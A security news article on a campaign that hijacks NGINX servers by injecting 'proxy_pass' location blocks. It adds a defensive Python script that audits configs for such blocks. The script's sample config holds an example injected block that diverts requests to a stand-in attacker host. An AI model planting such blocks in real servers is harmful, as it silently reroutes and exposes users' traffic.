Malicious Traffic Diversion: Hackers Compromise NGINX Servers
A sophisticated cyber threat actor is orchestrating a campaign to compromise NGINX servers, hijacking user traffic and redirecting it through their own backend infrastructure. The attack is particularly insidious because it abuses the legitimate features of NGINX, a widely used open-source web server and traffic-management tool, to evade detection.
NGINX acts as an intermediary between users and servers, handling web serving, load balancing, caching, and reverse proxying. The malicious campaign, uncovered by Datadog Security Labs, targets specific NGINX installations and Baota hosting management panels, focusing on websites with Asian top-level domains (.in, .id, .pe, .bd, .th) and government and educational sites (.edu, .gov).
The attackers employ a multi-stage toolkit to inject malicious 'location' blocks into existing NGINX configuration files. These blocks capture incoming requests on specific URL paths chosen by the attackers, preserve the full original request URL, and forward the traffic to attacker-controlled domains using the 'proxy_pass' directive. The technique is well disguised: 'proxy_pass' is a legitimate directive routinely used for reverse proxying and load balancing, so its presence alone does not trigger security alerts.
To keep the diverted traffic looking legitimate, request headers such as 'Host', 'X-Real-IP', 'User-Agent', and 'Referer' are preserved. The attack's multi-stage toolkit operates in the following manner:
- Stage 1: zx.sh - This initial script downloads and executes subsequent stages. It includes a fallback mechanism to send raw HTTP requests over TCP if curl or wget are unavailable.
- Stage 2: bt.sh - Targets Baota panel-managed NGINX config files, dynamically selecting injection templates based on server_name values, safely overwriting configurations, and reloading NGINX to prevent downtime.
- Stage 3: 4zdh.sh - Enumerates common NGINX config locations, using parsing tools to prevent corruption. It detects prior injections via hashing and a global mapping file, and validates changes before reloading.
- Stage 4: zdh.sh - Focuses on /etc/nginx/sites-enabled, targeting .in and .id domains. It follows the same config testing and reload process, with a forced restart as a fallback.
- Stage 5: ok.sh - Scans compromised configurations, mapping hijacked domains, injection templates, and proxy targets. Data is exfiltrated to a C2 server at 158.94.210[.]227.
The stealth of this attack lies in the fact that it exploits no NGINX vulnerability at all. Instead, it hides malicious instructions within configuration files, which are rarely reviewed. Because user traffic still reaches its intended destination, the detour through attacker infrastructure can go unnoticed unless configuration files are specifically monitored.
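The monitoring the article calls for can be implemented directly against the configuration text. The following script is an added example written for this page, not Datadog's tooling or any code from the campaign: it walks every 'location' block in an NGINX config, extracts the 'proxy_pass' target, flags upstreams that resolve to public hosts rather than loopback, private-range or named internal backends, reports which of the four preserved headers the block forwards, and computes a SHA-256 fingerprint of the file for baseline comparison. The sample configuration, the allowlist of internal upstream names and the `.invalid` attacker hostname are constructed for the demonstration.

```python
"""Audit NGINX config text for location blocks that reverse-proxy to external hosts.

Added example for this article; not Datadog's or the attackers' code.
The sample configuration below is constructed: one legitimate local
upstream and one injected block of the kind the article describes.
"""
import hashlib
import ipaddress
import re
from urllib.parse import urlparse

SAMPLE_CONF = """
server {
    listen 80;
    server_name example.in;

    location /api/ {
        proxy_pass http://127.0.0.1:8080;
        proxy_set_header Host $host;
    }

    location /news/ {
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header User-Agent $http_user_agent;
        proxy_set_header Referer $http_referer;
        proxy_pass http://cdn-relay.example-attacker.invalid$request_uri;
    }
}
"""

# Hypothetical allowlist: names of upstream{} blocks or hosts your fleet legitimately proxies to.
ALLOWED_UPSTREAM_HOSTS = {"localhost", "backend"}

# Headers the article says the injected blocks preserve; their presence is reported, not treated as proof.
WATCHED_HEADERS = {"host", "x-real-ip", "user-agent", "referer"}

LOCATION_RE = re.compile(r"location\s+(?:[=~*^]+\s+)?(\S+)\s*\{")
PROXY_PASS_RE = re.compile(r"proxy_pass\s+([^;\s]+)\s*;")
HEADER_RE = re.compile(r"proxy_set_header\s+(\S+)\s+[^;]+;")


def iter_location_blocks(conf):
    """Yield (path, body) for each location block, matching braces by depth count."""
    for m in LOCATION_RE.finditer(conf):
        start = m.end() - 1  # index of the opening '{'
        depth = 0
        for i in range(start, len(conf)):
            if conf[i] == "{":
                depth += 1
            elif conf[i] == "}":
                depth -= 1
                if depth == 0:
                    yield m.group(1), conf[start + 1:i]
                    break


def upstream_host(url):
    """Return the hostname of a proxy_pass target, ignoring nginx variables such as $request_uri."""
    clean = re.sub(r"\$\{?\w+\}?", "", url)
    if "://" not in clean:
        clean = "http://" + clean
    return urlparse(clean).hostname or ""


def is_external_upstream(host):
    """True when the upstream is a public IP or a dotted hostname outside the allowlist."""
    if not host or host in ALLOWED_UPSTREAM_HOSTS:
        return False
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        pass
    # Bare names without a dot are normally upstream{} names or /etc/hosts entries.
    return "." in host


def audit_config(conf):
    """Return one finding per proxy_pass directive, with its path, upstream and forwarded headers."""
    findings = []
    for path, body in iter_location_blocks(conf):
        headers = {h.lower() for h in HEADER_RE.findall(body)} & WATCHED_HEADERS
        for pm in PROXY_PASS_RE.finditer(body):
            host = upstream_host(pm.group(1))
            findings.append({
                "path": path,
                "upstream": host,
                "external": is_external_upstream(host),
                "forwarded_headers": sorted(headers),
            })
    return findings


def suspicious(findings):
    """Keep only the findings whose proxy_pass target is external."""
    return [f for f in findings if f["external"]]


def config_fingerprint(conf):
    """SHA-256 of the config text; store it as a baseline and alert when it changes."""
    return hashlib.sha256(conf.encode()).hexdigest()


if __name__ == "__main__":
    print("fingerprint:", config_fingerprint(SAMPLE_CONF))
    for f in suspicious(audit_config(SAMPLE_CONF)):
        print(f"SUSPECT location {f['path']} -> {f['upstream']} "
              f"(forwards: {', '.join(f['forwarded_headers'])})")
```

Run it against the files under /etc/nginx/ (including the sites-enabled directory the article names) and compare each fingerprint with the one recorded at deployment; a changed fingerprint together with a new external 'proxy_pass' target is the combination worth investigating. The allowlist and the "dotted hostname means external" heuristic are deliberately simple and should be tuned to your own upstream naming.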
The rapid evolution of IT infrastructure presents challenges for manual workflows. To stay ahead, organizations must embrace automation and intelligent workflows, as explored in the Tines guide: 'The Future of IT Infrastructure'. This guide offers insights into reducing manual delays, enhancing reliability through automated responses, and scaling workflows seamlessly on top of existing tools.